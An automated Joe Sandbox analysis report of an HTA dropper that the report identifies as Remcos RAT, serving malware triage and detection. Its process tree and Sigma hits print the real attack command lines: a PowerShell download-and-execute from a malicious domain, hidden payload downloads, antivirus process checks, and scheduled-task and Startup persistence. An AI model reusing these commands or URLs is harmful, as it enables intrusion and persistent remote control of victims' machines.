Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
c2.hta

Overview

General Information

Sample name:c2.hta
Analysis ID:1589232
MD5:ad959a16fe9d80c18b39e7b57bf7ca71
SHA1:16cd44bda6f1ab39811c990b316f2176a28542f0
SHA256:41b558fa4bdb281c1b7bf0fc73937b4e4f1caa3beccb752f3082cb665680aa40
Tags:htauser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected Remcos RAT
Multi AV Scanner detection for dropped file
Sigma detected: Drops script at startup location
Sigma detected: Remcos
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
AI detected suspicious sample
Drops PE files with a suspicious file extension
Drops large PE files
Found API chain indicative of sandbox detection
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Powershell drops PE file
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript called in batch mode (surpress errors)
Adds / modifies Windows certificates
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • mshta.exe (PID: 7212 cmdline: mshta.exe "C:\Users\user\Desktop\c2.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 7384 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:TEMP + '\c2.bat'; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -NoNewWindow" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7560 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c2.bat"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • powershell.exe (PID: 7576 cmdline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • Acrobat.exe (PID: 7736 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
          • AcroCEF.exe (PID: 8044 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
            • AcroCEF.exe (PID: 1744 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2072 --field-trial-handle=1344,i,14857468376700330533,7466528391267394821,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • powershell.exe (PID: 7836 cmdline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 3916 cmdline: powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • msword.exe (PID: 1228 cmdline: msword.exe MD5: 0DE162AA65BC5DAE2145333A0D1F8801)
          • cmd.exe (PID: 416 cmdline: "C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 5696 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
            • findstr.exe (PID: 5920 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
            • tasklist.exe (PID: 2124 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
            • findstr.exe (PID: 2188 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
            • cmd.exe (PID: 6832 cmdline: cmd /c md 361684 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • extrac32.exe (PID: 7048 cmdline: extrac32 /Y /E Approaches MD5: 9472AAB6390E4F1431BAA912FCFF9707)
            • findstr.exe (PID: 6288 cmdline: findstr /V "Korea" Measurement MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
            • cmd.exe (PID: 348 cmdline: cmd /c copy /b 361684\Propose.com + Different + Constitute + Instantly + Led + Indonesia + Dressing + Missed + Brian + Clinton + Protocol 361684\Propose.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • cmd.exe (PID: 3796 cmdline: cmd /c copy /b ..\Next + ..\Math + ..\Blocked + ..\Leisure + ..\Substantial + ..\Beam + ..\Cocks + ..\David + ..\Undefined + ..\Realm U MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • Propose.com (PID: 3272 cmdline: Propose.com U MD5: 62D09F076E6E0240548C2F837536A46A)
              • cmd.exe (PID: 3340 cmdline: cmd /c schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • conhost.exe (PID: 1360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • schtasks.exe (PID: 7860 cmdline: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F MD5: 48C2FE20575769DE916F48EF0676A965)
              • cmd.exe (PID: 8020 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & echo URL="C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • conhost.exe (PID: 3916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • choice.exe (PID: 7908 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • wscript.exe (PID: 7724 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • LinkHub.com (PID: 5236 cmdline: "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y" MD5: 62D09F076E6E0240548C2F837536A46A)
  • wscript.exe (PID: 2588 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • LinkHub.com (PID: 6644 cmdline: "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y" MD5: 62D09F076E6E0240548C2F837536A46A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Powerup Write Hijack DLL
Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7384, TargetFilename: C:\Users\user\AppData\Local\Temp\c2.bat
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3340, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, ProcessId: 7860, ProcessName: schtasks.exe
Sigma detected: Suspicious Invoke-WebRequest Execution
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:TEMP + '\c2.bat'; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -NoNewWindow", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:TEMP + '\c2.bat'; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -NoNewWindow", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\c2.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7212, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:TEMP + '\c2.bat'; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -NoNewWindow", ProcessId: 7384, ProcessName: powershell.exe
Sigma detected: Suspicious MSHTA Child Process
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:TEMP + '\c2.bat'; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -NoNewWindow", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:TEMP + '\c2.bat'; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -NoNewWindow", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\c2.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7212, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:TEMP + '\c2.bat'; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -NoNewWindow", ProcessId: 7384, ProcessName: powershell.exe
Sigma detected: Suspicious Script Execution From Temp Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c2.bat"", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7560, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", ProcessId: 7836, ProcessName: powershell.exe
Sigma detected: WScript or CScript Dropper
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", ProcessId: 7724, ProcessName: wscript.exe
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7384, TargetFilename: C:\Users\user\AppData\Local\Temp\c2.bat
Sigma detected: PowerShell Web Download
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:TEMP + '\c2.bat'; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -NoNewWindow", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:TEMP + '\c2.bat'; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -NoNewWindow", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\c2.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7212, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:TEMP + '\c2.bat'; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -NoNewWindow", ProcessId: 7384, ProcessName: powershell.exe
Sigma detected: Suspicious Schtasks From Env Var Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3340, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, ProcessId: 7860, ProcessName: schtasks.exe
Sigma detected: Usage Of Web Request Commands And Cmdlets
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:TEMP + '\c2.bat'; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -NoNewWindow", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:TEMP + '\c2.bat'; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -NoNewWindow", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\c2.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7212, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:TEMP + '\c2.bat'; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -NoNewWindow", ProcessId: 7384, ProcessName: powershell.exe
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", ProcessId: 7724, ProcessName: wscript.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:TEMP + '\c2.bat'; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -NoNewWindow", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:TEMP + '\c2.bat'; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -NoNewWindow", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\c2.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7212, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:TEMP + '\c2.bat'; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -NoNewWindow", ProcessId: 7384, ProcessName: powershell.exe

Data Obfuscation

barindex
Sigma detected: Drops script at startup location
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 8020, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url

HIPS / PFW / Operating System Protection Evasion

barindex
Sigma detected: Search for Antivirus process
Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 416, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 2188, ProcessName: findstr.exe

Stealing of Sensitive Information

barindex
Sigma detected: Remcos
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com, ProcessId: 3272, TargetFilename: C:\ProgramData\remcos\logs.dat

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-11T22:54:07.743351+010020365941Malware Command and Control Activity Detected192.168.2.449822193.26.115.397009TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-11T22:54:08.890787+010028033043Unknown Traffic192.168.2.449830178.237.33.5080TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-11T22:52:59.056498+010018100002Potentially Bad Traffic192.168.2.449732193.26.115.39443TCP
2025-01-11T22:53:01.420101+010018100002Potentially Bad Traffic192.168.2.449734193.26.115.39443TCP
2025-01-11T22:53:06.452263+010018100002Potentially Bad Traffic192.168.2.449737193.26.115.39443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSERDOMAIN=MQAWXUYUSERDOMAIN_ROAMINGPAvira URL Cloud: Label: phishing
Source: https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSERDOMAIN=MQAWXUYUSERDOMAIN_ROAAvira URL Cloud: Label: phishing
Source: https://myguyapp.com/mtAvira URL Cloud: Label: phishing
Source: https://candwfarmsllc.com/c2.batAvira URL Cloud: Label: malware
Source: https://myguyapp.com/W2.pdf9Avira URL Cloud: Label: phishing
Source: https://myguyapp.com/mswAvira URL Cloud: Label: phishing
Source: https://myguyapp.com/W2.pdfGAvira URL Cloud: Label: phishing
Source: https://myguyapp.com/msword.zipqDAvira URL Cloud: Label: phishing
Source: https://myguyapp.com/W2.pdfsDAvira URL Cloud: Label: phishing
Source: https://myguyapp.com/W2.pdfAvira URL Cloud: Label: phishing
Source: https://myguyapp.com/msword.zipurAvira URL Cloud: Label: phishing
Source: https://myguyapp.com/W2.pAvira URL Cloud: Label: phishing
Source: https://myguyapp.com/msword.zipbNAvira URL Cloud: Label: phishing
Source: https://myguyapp.com/W2.pdfUSERDOMAIN=MQAWXUYUSERDAvira URL Cloud: Label: phishing
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeReversingLabs: Detection: 15%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.8% probability
Source: unknownHTTPS traffic detected: 193.26.115.39:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 193.26.115.39:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknownHTTPS traffic detected: 193.26.115.39:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 16_2_004062D5 FindFirstFileW,FindClose,16_2_004062D5
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 16_2_00402E18 FindFirstFileW,16_2_00402E18
